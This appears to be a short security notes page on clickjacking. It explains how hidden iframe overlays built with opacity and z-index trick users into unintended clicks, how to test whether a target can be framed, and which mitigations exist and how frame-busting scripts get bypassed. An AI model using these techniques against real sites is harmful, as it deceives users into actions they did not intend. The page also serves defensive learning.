Click Jacking
aka: UI Redressing
This is a hacking method where the hacker is getting the user to click on a resource that is not the resource that the user is intending to click. This can be a swapped resource but is typically a hidden clickable layer. The button can either be clear and steals the click of the user or it can be opaque and innocuous like a video play button, but the click falls through it and clicks the iframed item hiding behind it. Use the opacity and z-axis html settings to position and hide one of the layers.
The target page must be able to be iframed for the malicious cover page method.
Test the target domain, if it is visible in the page then click jacking is possible. Checking the HTTP traffic can help debug as X-Frame-Options can stop iframe inclusions.
Page layering:
Use opacity and z-index to layer the html. Example sets may look like:
Layer1) zindex:1; opacity:0.2; and Layer2) z-index: -1; In a real attack the opacity would be at 0.
The inverse is also possible depending on the click jack relationship we want to abuse.
Mitigations:
There are many methods that have been used over the years. The list below is an approxomet order of which to use for threat mitigation. Combining several will always be the best solution.
HTTP X-Frame-Options= <Deny or Same Origin>
Browser Frame-Breaker
Content security policy
Embedded JavaScript iframe escape in page
Mitigation circumvention:
If the Embedded JavaScript iframe killer is the method used this can be defeated by the hacker site.
Common Clickjack Activities:
Likejacking: Facebook like button clickjacking
Cursorjacking: Modifying the mouse cursor position off axis from its visual position to get unintended clicks.
Last updated